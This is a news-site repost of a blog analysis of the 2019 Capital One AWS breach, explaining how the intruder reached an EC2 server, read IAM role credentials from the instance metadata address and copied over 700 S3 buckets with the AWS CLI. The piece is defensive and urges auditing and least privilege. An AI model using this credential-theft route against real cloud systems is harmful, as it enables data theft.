Stories
Slash Boxes
Comments

SoylentNews is people

SoylentNews is powered by your submissions, so send in your scoop. Only 13 submissions in the queue.

Submission Preview

Link to Story

The Technical Side of the Capital One AWS Security Breach

Accepted submission by upstart at 2019-08-02 21:02:49
/dev/random

████ This a robot sub whomst needing edited. Please report broken subs to chromeass, ████

Submitted via IRC for AnonymousLuser

The Technical Side of the Capital One AWS Security Breach [jcolemorrison.com]

On July 19th, 2019 Capital One got the red flag that every modern company hopes to avoid - their data had been breached. Over 106 million people affected. 140,000 Social Security numbers. 80,000 bank account numbers. 1,000,000 Social Insurance Numbers. Pretty messy right?

Unfortunately, the 19th wasn't when the breach occurred. It turns out that Paige Thompson, aka Erratic, had done the deed between March 22nd and March 23rd 2019. So almost 4 months earlier. In fact, it took an external tip for Capital One to realize something had happened.

Though the former Amazon employee has been arrested and is facing $250k in fines and 5 years in prison...it's left a lot of residual negativity. Why? Because of many of the companies who've suffered data breaches try to brush off the responsibility of hardening their infrastructures and applications to the increased cyber crime.

ANYHOW. You can read more about the case by just asking Google. We won't go into that anymore. We're here to talk about the TECHNICAL side of things.

So first up - what happened?

Capital One had about 700 different S3 buckets that Paige Thompson copied and downloaded.

Second - was this just another case of a misconfigured S3 Bucket Policy?

Nope, not this time. Instead, she was able to access a server that had a misconfigured firewall and do it from there.

Wait how is this possible?

Well first, let's start with getting into the server. The details in terms of how she accessed one of their servers are very little. All we've been told is that it was through a "misconfigured firewall." So something as simple as a crappy security group setup, a web app firewall configuration (Imperva), or network firewall (iptables, ufw, shorewall, etc). All we know from Capital One is that they've accepted that it's their fault [washingtonpost.com] and that they've closed the hole.

Stone said that while Capital One missed the firewall vulnerability on its own, the bank moved quickly once it did. That certainly was helped by the fact that the hacker allegedly left key identifying information out in the open, Stone said.

(Edit: for folks curious about not going deeper here, understand that due to the limited info the best we can do is speculate on this part of the breach. This is relatively pointless considering the breach depended upon Capital One leaving an opening. And unless they come out and tell us more, we’d just be cycling through every possible way Capital One left their server open in combo with every possible way someone could exploit one of those various options. These openings and techniques can range from wildly stupid oversights to incredibly sophisticated patterns. Given the range of possibilities, this would turn into a long winded saga with no real conclusion on this point. Therefore, we’ll focus on analyzing the things that we DO have the facts for.)

And so there's the first thing to do - know what your firewalls allow

Keep a policy or process in place to ensure that ONLY what should be open is open. If you're using AWS resources like Security Groups or Network ACLs, obviously something as simple as a checklist can go a long way...but since many resources are created through automation (i.e. CloudFormation), one can also automate the auditing of these things. Whether that's a home-baked script that looks through what you're creating for crappy openings or something like working in security review during your CI/CD process...there's plenty of simple options to avoid this.

The "funny" part about this breach is that if Capital One had plugged this hole from the get go...nothing else would've happened. And so, quite frankly, it's always shocking to see something that's really not that difficult become the sole reason for a company data breach. Especially one as large as Capital One.

Okay, so the hacker is in the box - what happened next?

Well, once you're in an EC2 Instance...a lot can go wrong. You're pretty much walking on the edge of a knife if you let someone get that far. But how did she get into the S3 buckets? To understand how, let's talk about IAM Roles.

So, to access AWS services, one way to do so is to be a User. Okay, pretty obvious. But what about if you want to give other things in AWS, for example your Application Servers, the permission to do things like access your S3 buckets? Well, that's what IAM Roles are for. An IAM Role has two components:

a) The Trust Policy - what services, or what people, can use this role?

b) The Permissions Policy - what does this role allow?

And so, for example, if you wanted to create an IAM Role that allowed EC2 instances to access an S3 bucket: first, the role would have a Trust Policy specifying that EC2 (the whole service), or specific instances, can "assume the role." By assume the role, that means that they can use the role's permissions to do things. Second, the permissions policy would allow the service/person/resource that has "assumed the role" to do things on S3, whether that's access one specific buckets...or over 700 in Capital One's case.

The thing is though, once you're on an EC2 Instance with an IAM Role, you can do a few things to get the credentials:

1. You can query the instance's metadata at http://169.254.169.254/latest/meta-data [169.254.169.254]

Among other things, the IAM Role with any of its access keys can be found through this. Of course...its only possible if you're IN the instance.

2. Use the AWS CLI ...

Again, if you've made it on the instance, then if the AWS Command Line Interface is installed, it gets loaded up with credentials from IAM Roles if they're present. All you have to do is do things THROUGH the instance. Granted, if their Trust Policy was open, Paige may have been able to do it directly.

So the Tl;dr on IAM Roles are that they're a way to let other resources ACT ON YOUR BEHALF on OTHER RESOURCES.

Now that you understand IAM Roles, we can talk about what Paige Thompson did:

  1. She accessed the Server (EC2 Instance) through an opening in the server firewalls

    Whether it was a security group / ACL or their own custom web application firewalls, whatever it was, it was apparently pretty easy to close down as noted in the official complaints and records.

  2. Once in the Server, she was able to act "as if" she was the server itself

  3. Since the Server's IAM Role allowed for S3 access to those 700+ Buckets, she was able to access them

From that point forward all she had to do was run the "List Buckets" command and then the "Sync" command from the AWS CLI...

Capital One indicated that this breach will cause nearly $100 to $150 MILLION in costs. [capitalone.com] Preventing this type of pain is why companies are investing so much into Cloud Infrastructure, DevOps, and Security experts. And just how valuable and cost effective is moving to the cloud? So much that even in the face of more and more cyber security issues, the total public cloud market grew 42% in Q1 of 2019 [canalys.com]!

Moral of the story: audit your security; keep auditing your security regularly; respect the principle of least privilege for security policies.

(You can checkout the full legal report here [regmedia.co.uk])

J Cole Morrison

Cloud Architect, Software Engineer, former Techstars Hackstar, AWS Solutions Architect, and Founder/Headmaster at awsdevops.io

Learn the core component of every modern infrastructure on AWS: Servers!

Checkout the FREE Video Series [awsdevops.io]No Thanks. Close This Please.


Original Submission